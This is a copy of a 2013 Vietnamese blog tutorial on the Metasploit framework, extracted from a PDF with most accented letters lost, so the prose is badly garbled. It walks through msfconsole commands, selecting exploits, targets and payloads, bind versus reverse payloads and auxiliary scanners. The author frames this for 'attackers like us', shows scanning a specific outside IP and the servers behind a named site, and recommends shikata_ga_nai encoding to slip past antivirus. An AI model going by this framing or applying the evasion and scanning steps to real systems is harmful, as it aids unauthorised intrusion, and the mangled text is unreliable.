Está en la página 1de 12

9/1/13 Metasploit framework | kevin

kevinkien.blogspot.com/2013/04/metasploit-framework.html 1/12
12th April
Mnh xem trn mng.Ti liu v Metasploit Framework ting vit kh t.V khng y .Nn
mnh vit li nhng g mnh bit ,tham kho thm mt s ngun ting anh [ Mc ch l gip
newbie bit r hn ,v lm ti liu chnh thc t vhb,Khng phi ly t ngun khc.C mt bi
kakavn_85 leech v vhb ri.Nhng bi kh s si ,nn mnh vit li bi ny].Hin ti cn mt
s phn cha hon thnh.Anh em no am hiu v cc module encoders module v Nops module
trong metasploit framework th pm yahoo mnh icarus_ken. cng mnh bin son k hn v 2
phn ny.
-Metasploit framework l mt framework m ngun m pht trin nhm s dng cc shellcode
(payload) tn cng my c l hng.Cng vi mt s b cng c bo mt khc,Metasploit c c
s d liu cha hng ngn shellcode ,hng ngn exploit ca cc h iu hnh,cc chng trnh
hay dch v.Trong qu trnh pht trin metasploit lin tc cp nht cc Exploit...Nn cng ngy n
cng tr thnh mt b cng c mnh m.
-Metasploit framework l mt b d n sinh ra kim tra an ton (pentesting ) nhng i vi
nhng attacker nh chng ta,th n thc s l mt cng c v cng hu ch ( dng kim tra
,khai thc li ,exploit ).Thc s theo mnh ngh th ai mun lm hacker (hay script kidie i chng
na ) th cng nn b thi gian ra nghin cu k v n.
-Ni s qua Metasploit framework l mt phn nh ca d n Metaspoit ( c xy dng t ngn
ng perl sau c vit li bng ruby.ng ra l ch yu bng ruby).
B metasploit framwork h tr giao din cho ngui dng di nhiu dng
-Console interface : Dng lnh msfconsole .a s thao tc bng dng lnh.
-GUI -armitage : Dng Armitage vo.y l giao din ha.
-Command line interface : dng lnh msfcli vo
Ta ch yu thc thi trn msfconsole ,nhn cho n chuyn nghip )
Msfconsole c nhiu cu lnh,option khc nhau.Doi y l ni dung cc lnh i vi msfconsole .
==========================
1 back
2 check
3 connect
4 info
5 irb
6 jobs
7 load
7.1 loadpath
7.2 unload
8 resource
Metasploit framework
9/1/13 Metasploit framework | kevin
kevinkien.blogspot.com/2013/04/metasploit-framework.html 2/12
9 route
10 search
10.1 help
10.2 name
10.3 path
10.4 platform
10.5 type
10.6 author
10.7 multiple
11 sessions
12 set
12.1 unset
13 setg
14 show
14.1 auxiliary
14.2 exploits
14.3 payloads
14.3.1 payloads
14.3.2 options
14.3.3 targets
14.3.4 advanced
14.4 encoders
14.5 nops
15 use
=======================
Mnh s trnh by s ni dung ca nhng lnh ny.
+back : lnh ny dng khi bn mun thot ra khi module bn chn trc sau khi hon
thnh cng vic,hoc mun chuyn sang module khc.Tt nhin l c th chn ngay module khc
lun m khng cn thot ra.
v d
msf payload(reverse_http) > back
msf>
+check : Lnh na gip ta kim tra cu hnh ng cho exploit cha,mi vic hon thnh
cha.Cho ta bit kt qu m khng cn phi thc thi exploit .Nhng khng phi tt c mi
exploit u h tr lnh ny.
+connect : Lnh ny ging nh mt bn netcat thu nh c cho vo metasploit c h tr vi
ssl,proxy,povoting...Vi vic dng cu lnh connect vi a ch ip v port tng ng,chng ta c
th connect ti mt host t metasploit ging nh khi dng vi netcat hoc telnet vy.
v d nh
msf > connect 118.69.228.254 22[*] Connected to 118.69.228.254:22
9/1/13 Metasploit framework | kevin
kevinkien.blogspot.com/2013/04/metasploit-framework.html 3/12
SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1
+info : lnh ny cho bit nhng thng tin chi tit ca mt module (hay mt exploit no ) .hin
th cho ta thng tin c bn nht,bao gm c cc option cn thit....
[http://2.bp.blogspot.com/-50xmaYpI_nA/UV88tuiFvWI/AAAAAAAAAiU/bNtkluHV_a8/s1600/6.png]
+irb : lnh ny cho ta thao tc trn mi trng ca ruby
v d
msf > irb -h[*] Starting IRB shell...
>> puts "welcom to vhbfamily"
welcom to vhbfamily
=> nil
+jobs: lnh ny cho ta bit cc module ang chy.
v d
msf > jobs
Jobs
====
No active jobs.
msf > jobs -h
Usage: jobs [options]
9/1/13 Metasploit framework | kevin
kevinkien.blogspot.com/2013/04/metasploit-framework.html 4/12
Active job manipulation and interaction.
OPTIONS:
-K Terminate all running jobs.
-h Help banner.
-i <opt> Lists detailed information about a running job.
-k <opt> Terminate the specified job name.
-l List all running jobs.
-v Print more detailed info. Use with -i and -l
+load: lnh ny load mt plugin t metasploit plugins.
v d:ta lit k ra danh sch cc plugin c v load th mt ci.Sau unload lun plugin m
chng ta va load.
msf > cd /opt/metasploit/msf3/plugins/
msf > ls[*] exec: ls
alias.rb
auto_add_route.rb
db_credcollect.rb
db_tracker.rb
editor.rb
event_tester.rb
ffautoregen.rb
ips_filter.rb
lab.rb
msfd.rb
msgrpc.rb
nessus.rb
nexpose.rb
openvas.rb
pcap_log.rb
sample.rb
session_tagger.rb
socket_logger.rb
sounds.rb
thread.rb
token_adduser.rb
token_hunter.rb
wmap.rb
msf > load alias.rb[*] Successfully loaded plugin: alias
msf > unload alias.rb
+search :command gip ta tm kim exploit,auxiliary,encoder.... (trong n cn h tr mt s
keywork gip ci tin kh nng tm kim nh
9/1/13 Metasploit framework | kevin
kevinkien.blogspot.com/2013/04/metasploit-framework.html 5/12
Keywords:
name : Modules with a matching descriptive name
path : Modules with a matching path or reference name
platform : Modules affecting this platform
port : Modules with a matching remote port
type : Modules of a specific type (exploit, auxiliary, or post)
app : Modules that are client or server attacks
author : Modules written by this author
cve : Modules with a matching CVE ID
bid : Modules with a matching Bugtraq ID
osvdb : Modules with a matching OSVDB ID
edb : Modules with a matching Exploit-DB ID
V d nh :
search cve:2009 type:exploit app:client
+sessions: lnh ny lit k cc session ang tn ti ,session y c th l session ca shell,ca
meterpreter ....
+set : lnh cho php ta cu hnh cho cc exploit...lnh ny gp thng xuyn .(unset l lnh c
ngha nguc li ).
+setg: trong qu trnh thc hin tn cng mt mc tiu,hoc nhiu mc tiu.Ta c th dng mt
exploit hoc i khi l nhiu exploit.C mt vo option nu set bnh thng th ta phi set nhiu
ln.Nhng nu ta cho cc option ny c ngha ton cc.Th vic lp li l khng cn.N c
hiu lc cho mi exploit,auxiliary . l ngha ca setg (global set). hy th ta dng unsetg
.Nu mun lu vic cu hnh ny li dng lnh "save".
+show : lnh ny cho php hin th ty theo tham s i sau n .Nu l "show all" th n hin th
tt c cc module c trong metasploit framework,cn nu "show exploits" th n ch hin th cc
exploit c trong module exploits m thi.Tng t cho cc module khc.Lnh show cn dng
cho ta thy cc tham s thuc tnh (show options).
+use : lnh ny dng chn v dng mt exploit,auxiliary...no .
Cch dng metasploit c lm theo qui nh chung sau
Chn mt module attack (Thng ta dng module Exploies v Auxiliary attack,cc module
khc h tr cho 2 module ny).
C th dng lnh "show all" .N s lit k tt c cc modules ra cho ta.
hin th cc exploit,auxiliary,payload... ca mt Module c th hn ta dng lnh "show
type_module" mnh v d nh :show exploits , show encoders,show payload,show nops....
Xem biu sau hnh dung k hn v cu trc ca metasploit framework
9/1/13 Metasploit framework | kevin
kevinkien.blogspot.com/2013/04/metasploit-framework.html 6/12
[http://1.bp.blogspot.com/-
sgnrfzjYWRI/UV6k-sraWOI/AAAAAAAAAhU/KWg_5PsRYtM/s400/1.png]
REX : Th vin ruby cho cc cng vic bo mt
Framework Core :Cung cp giao din cho vic chy cc module v plugins.
MSF Base : d giao tip hn vi cc module trong framework.
Exploit Modules.
u tin chn exploit,mun chn ta c th dng lnh "show exploits" hin ra tt c cc exploit
m metasploit framework c h tr.
dng exploit no ta dng cu lnh "use name_exploit" .Trong tham s name_exploit l
tn ca exploit c metasploit h tr, bit thm cc thng tin v exploit m ta chn c th
dng lnh "info name_exploit".
v d mnh s dng mt exploit sau khi lit k ra s l:
use windows/manage/add_user_domain
Sau khi chn mt exploit vi command use,vic tip theo l cu hnh cc options m exploit
ny yu cu.( r hn exploit ny n yu cu cu hnh nh th no,phi cu hnh nhng g,ta
s dng lnh "show options".
Khi s dng lnh show option ta thng nhn c mt bng gm cc ct nh sau:
Name-----Current Setting-------Required---------Description
Trong , ct required nu gi tr l "yes" th bn phi set gi tr cho tham s ny,cn nu l
"no" th nu thch th bn set cho n,nu ko thch th cng chng sao.Quan trng phi xem mt
s n cu hnh mc nh cho ri c thch hp vi chng ta hay ko. (Ngoi ra n cn c thm
mt s options khc,dng "show advanced" , "show evasion" xem nh.
9/1/13 Metasploit framework | kevin
kevinkien.blogspot.com/2013/04/metasploit-framework.html 7/12
Sau khi cu hnh xong ta cn kim tra xem vic cu hnh ng cha.
kim tra vic cu hnh ta dng lnh "check " xem mc tiu c b tn cng c hay khng.y
l mt cch nhanh ta kim tra xem vit cu hnh cc options bng lnh set c ng hay khng
v mc tiu thc s c l hng khai thc c hay khng.Nhng khng phi tt c cc exploit
u thc s c th kim tra c bng vic s dng lnh check.i khi ta phi thc s exploit n
mi bit c )
* Chn mi trng hat ng.
Nhiu exploits n cn yu cu mi trng c th thc hin ch khng phi mi trng no n
cng c th lm c.Chnh v vy ta dng lnh "show targets " xem trn mi trng no c th
exploit.
v d nh:
exploit(java_signed_applet) > show targets
Exploit targets:
Id Name
-- ----
0 Generic (Java Payload)
1 Windows x86 (Native Payload)
2 Linux x86 (Native Payload)
3 Mac OS X PPC (Native Payload)
4 Mac OS X x86 (Native Payload)
Cho ta thy danh sch cc mi trng c th hat ng.
chn mi trng cho n ta dng lnh "set number_of_target" . Trong i s
number_of_target l s th t (s id) khi lit k ra.iu g xy ra nu bn khng chn mi
trng target ? .Trong qu trnh exploit n s t chn mc nh cho ta.V thc t iu ny
khng phi khi no cng ng nh mong i.V vy ta chn bng tay l tt nht.(Tt nhin phi
scan OS trc).
* Chn Payload : (Selecting the Payload).
Trc tin Payload l g.Bn c th hiu n n gin nh cc thut ng thung quen vi cc bn
hn nh l trojan chng hn.N l mt on code c chy (thc thi )trn my victim,dng
thc hin mt s hat ng no ,hoc dng kt ni v my attacker.Vy lm sao c ci
Payload ) ny trn my ca victim ? .C 2 phng php ch yu c dng.Phn loi ra vy
thi ch khi dng th cn ty trng hp m dng. l gi cho victim thng qua vic phn tnh
mt li,l hng no trn h thng victim,t t nhp v vt on payload ny cho
victim. chi.Kiu th 2 l gi trc tip cho victim,ch i victim s nhn n ( k thut
social engineering y ).
hin th cc payloads tch hp cho exploit hin ti chng ta ang dng.ta dng lnh "show
9/1/13 Metasploit framework | kevin
kevinkien.blogspot.com/2013/04/metasploit-framework.html 8/12
payloads" ,v d mnh minh ha bng 3 payload sau :
windows/dllinject/bind_nonx_tcp - normal Reflective DLL Injection, Bind TCP Stager (No NX or
Win7)
windows/dllinject/bind_tcp - ormal Reflective DLL Injection, Bind TCP Stager
windows/meterpreter/reverse_http -normal Windows Meterpreter (Reflective Injection), Reverse
HTTP Stager
Nh ta thy c nhiu payload,tng ng vi mi OS khc nhau ta dng mt payload khc
nhau,v phng php cng khc nhau. Cc giao thc dng cng khc nhau....Nhn chung i vi
payload c th phn ra lm 2 loi c bn l bind payload,v reverse payload .Khi no ta dng
loi no.y cng l mt vn quan trng.Nu nh my ca bn (ng vai tr l attacker) ng
sau mt tng la,th lc ny bn nn dng bind payload .M mt port trn my tnh v kt ni
trc tip t my attacker n my victim.Cn nu nh victim ng sau mt tng la,cn chng
ta th khng,khi chng ta dng reverse payload, connect ngc t my victim v ta
(attacker ).Nh vy cho thy khi tn cng mc tiu.Ta phi tm hiu r rng v mc tiu.Scan,tm
kim tt c cc thng tin c th c.Da vo m chn cch thch hp.
Khi bn quyt nh chn mt payload no ,dng lnh "set PAYLOAD name_payload" chn
payload cn dng.
gii s mun dng payload windows/meterpreter/reverse_ord_tcp th ta thao tc l :
set PAYLOAD windows/meterpreter/reverse_ord_tcp
nhn c l :PAYLOAD => windows/meterpreter/reverse_ord_tcp
Tng t xem r thng tin,option v payload ta c th dng cc lnh nh "show options"
,"info name_payload" ,"show advanced" ,"show evasion"...
Nhc thm mt ln na, l payload c chn phi ph hp vi mi trng thc thi chn
trn .Nu mc tiu l linux m dng payload cho window th thua ri.
Sau khi thc hin tt c cc thit lp xong th ta dng lnh "exploit" xem thnh qu.
MODULE AUXILIARY:
cung cp chc nng tng cng cho cc th nghim xm nhp v qut l hng cng vi cc tc
v t ng.
phn loi trong auxiliary module:
-module qut cc giao thc ( nh SMB,HTTP).
-Module qut cch cng port
-Wireless
-IPV6
-DOS
-Server modules.
9/1/13 Metasploit framework | kevin
kevinkien.blogspot.com/2013/04/metasploit-framework.html 9/12
-Module khai thc truy cp qun tr
Mnh v d v mt dch v qut ssh .N h tr cc dch v kh y .Lc show auxiliary ra s
thy,rt l nhiu.( tm cc exploit hay auxiliary mt cch nhanh hn,ta dng lnh search,ch
tt nhin khng th nh ht,hoc lit k ra th tm cng mi mt.V d mnh mun qut ssh i,th
thc hin "search ssh".
[http://3.bp.blogspot.com/-
AK2aNsM3ihk/UV7rQ9nCAlI/AAAAAAAAAhk/d0rqyNxVXz4/s400/2.png]
Ch trong auxiliary module vic set remote host ta dng "set RHOSTS" ch khng phi l "set
RHOST" nh bn exploit module u y.
Nh trong v d ta scan c phin bn ssh ca server 118.69.228.254. Cc tham s cn li
mnh mc nh ht.
V d v scan port: Mnh s scan xem site no m cng 443 (https) v 80 dng giao thc tcp i
vi cc site nm trong server cha kmasecurity.net
9/1/13 Metasploit framework | kevin
kevinkien.blogspot.com/2013/04/metasploit-framework.html 10/12
[http://2.bp.blogspot.com/-oH32QBtUOJo/UV7u6GuTl7I/AAAAAAAAAhs/3BoYmgScwoo/s1600/3.png]
Vic s dng auxiliary ni tm li gm 3 bc cn bn, l chn auxiliary,sau set cc option
cn thit cho n.Cui cng l run thc hin thi.Vic nm c tt c cc auxiliary l rt tt.S
gip chng ta linh ng hn trong vic tn cng mt i tng no .
Cc lnh payload thng dng l:
generate : pht sinh mt payload.
pry: m mt pry( mt tnh nng thay th cho tiu chun IRB shell ca ruby)
session trong module hin ti.
reload : chy li reload li module hin ti
Module Payloads:Nh ni trn n l mt shellcode.Trong metasploit framework cung cp
sn kh nhiu loi payloads.
9/1/13 Metasploit framework | kevin
kevinkien.blogspot.com/2013/04/metasploit-framework.html 11/12
on trn mnh ni s qua payload,chc mi ngi cng hnh dung c v payload ri.
phn ny mnh trnh by thm v module payload.
Dng lnh "show payloads" lit k cc payload c trong metasploit.
tm hiu k hn v cc lnh ny ta dng tham s -h (--help) ,t m set cc gi tr thch
hp.Mnh minh ha mt v d.
[http://4.bp.blogspot.com/-DE4TecBcEOk/UV8EheGwc7I/AAAAAAAAAh8/cE01Yq7-ezw/s1600/4.png]
9/1/13 Metasploit framework | kevin
kevinkien.blogspot.com/2013/04/metasploit-framework.html 12/12
[http://2.bp.blogspot.com/-hpCBTVMdlTo/UV8Euj8-OMI/AAAAAAAAAiE/YeI6tUtKoYM/s1600/5.png]
Nh ta thy c th dng option -E encode cho payload ca chng ta,tng kh nng vt
antivirut.
nu khng chn g th c th type lnh n gin l "generate" thi l c ri.
Trong qu trnh encoding, payload c encoding v c chn vo nhng k t c bit.
Tt nhin ta c th t chn cc b cng c encode khc nhau trong metasploit .V d encode
mt payload ,Ta mun th cc kiu encoding khc nhau.C th s dng lnh "show
encoders".Lc ny n s hin ra mt lot cc b cng c encode.S dng mt b encoding no
ta type nh sau : "generate -e x86/shikata_ga_nai". Trong "x86/shikata_ga_nai" l mt b
encoding trong encoders module.
C rt nhiu b encoder c h tr ca Metasploit framework.Chnh v vy bn nn chn mt b
no encode .Gip hiu qu hn trong qu trnh n mnh.
ng 12th April bi lightning
Nhn: ubuntu